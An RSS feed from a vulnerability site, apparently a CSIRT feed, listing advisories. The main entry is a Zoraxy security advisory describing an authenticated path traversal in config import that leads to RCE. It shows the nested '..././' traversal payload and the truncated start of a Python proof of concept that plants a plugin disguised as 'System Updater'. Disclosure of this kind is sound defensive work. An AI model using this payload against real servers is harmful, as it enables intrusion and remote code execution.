<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 05:52:39 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-277865</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-277865</link>
      <description>EUVD-2026-277865</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-277865</guid>
    </item>
    <item>
      <title>fkie_cve-2026-33529</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-33529</link>
      <description>&lt;p&gt;Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Zoraxy is a general purpose HTTP reverse proxy and forwarding tool. Prior to version 3.3.2, an authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin. Version 3.3.2 patches the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-33529</guid>
    </item>
    <item>
      <title>GHSA-7pq3-326h-f8q9 — Zoraxy: Authenticated Path Traversal in Config Import leads to RCE</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-7pq3-326h-f8q9</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/tobychui/zoraxy&lt;/p&gt;
&lt;p&gt;# Authenticated Path Traversal to RCE via Configuration Import&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;An authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;The vulnerable endpoint is `POST /api/conf/import`.&lt;/p&gt;
&lt;p&gt;The zip entry names sanitization is bypassed by embedding `../` inside a longer sequence so the replacement produces a new `../`:&lt;/p&gt;
&lt;p&gt;```
conf/..././..././entrypoint.py
  → ReplaceAll(&amp;#34;../&amp;#34;, &amp;#34;&amp;#34;)  (match found at index 1 of &amp;#34;..././&amp;#34;, leaving &amp;#34;../&amp;#34;)
  → conf/../../entrypoint.py   ← passes HasPrefix check, escapes conf/
```&lt;/p&gt;
&lt;p&gt;Using this endpoint, a new plugin can be written (persistent) and the entrypoint (non-persistent) can be edited to add execution permissions to the plugin.
When the database is provided in the import, the program should exit to trigger a container restart (which does not happen because the entrypoint does not monitor the Zoraxy exit code).
As a result, the container was manually restarted for the PoC to work.&lt;/p&gt;
&lt;p&gt;## PoC&lt;/p&gt;
&lt;p&gt;```python
import argparse
import io
import json
import re
import sys
import zipfile&lt;/p&gt;
&lt;p&gt;import requests
import urllib3&lt;/p&gt;
&lt;p&gt;urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)&lt;/p&gt;
&lt;p&gt;INTRO_SPEC_JSON = json.dumps({
    &amp;#34;id&amp;#34;: &amp;#34;com.attacker.evil&amp;#34;,
    &amp;#34;name&amp;#34;: &amp;#34;System Updater&amp;#34;,
    &amp;#34;author&amp;#34;: &amp;#34;System&amp;#34;,
    &amp;#34;author_contact&amp;#34;: &amp;#34;&amp;#34;,
    &amp;#34;description&amp;#34;: &amp;#34;Internal system update module&amp;#34;,
    &amp;#34;url&amp;#34;: &amp;#34;&amp;#34;,
    &amp;#34;ui_…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/tobychui/zoraxy&lt;/p&gt;
&lt;p&gt;# Authenticated Path Traversal to RCE via Configuration Import&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;An authenticated path traversal vulnerability in the configuration import endpoint allows an authenticated user to write arbitrary files outside the config directory, which can lead to RCE by creating a plugin.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;The vulnerable endpoint is `POST /api/conf/import`.&lt;/p&gt;
&lt;p&gt;The zip entry names sanitization is bypassed by embedding `../` inside a longer sequence so the replacement produces a new `../`:&lt;/p&gt;
&lt;p&gt;```
conf/..././..././entrypoint.py
  → ReplaceAll(&amp;#34;../&amp;#34;, &amp;#34;&amp;#34;)  (match found at index 1 of &amp;#34;..././&amp;#34;, leaving &amp;#34;../&amp;#34;)
  → conf/../../entrypoint.py   ← passes HasPrefix check, escapes conf/
```&lt;/p&gt;
&lt;p&gt;Using this endpoint, a new plugin can be written (persistent) and the entrypoint (non-persistent) can be edited to add execution permissions to the plugin.
When the database is provided in the import, the program should exit to trigger a container restart (which does not happen because the entrypoint does not monitor the Zoraxy exit code).
As a result, the container was manually restarted for the PoC to work.&lt;/p&gt;
&lt;p&gt;## PoC&lt;/p&gt;
&lt;p&gt;```python
import argparse
import io
import json
import re
import sys
import zipfile&lt;/p&gt;
&lt;p&gt;import requests
import urllib3&lt;/p&gt;
&lt;p&gt;urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)&lt;/p&gt;
&lt;p&gt;INTRO_SPEC_JSON = json.dumps({
    &amp;#34;id&amp;#34;: &amp;#34;com.attacker.evil&amp;#34;,
    &amp;#34;name&amp;#34;: &amp;#34;System Updater&amp;#34;,
    &amp;#34;author&amp;#34;: &amp;#34;System&amp;#34;,
    &amp;#34;author_contact&amp;#34;: &amp;#34;&amp;#34;,
    &amp;#34;description&amp;#34;: &amp;#34;Internal system update module&amp;#34;,
    &amp;#34;url&amp;#34;: &amp;#34;&amp;#34;,
    &amp;#34;ui_…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-7pq3-326h-f8q9</guid>
    </item>
  </channel>
</rss>
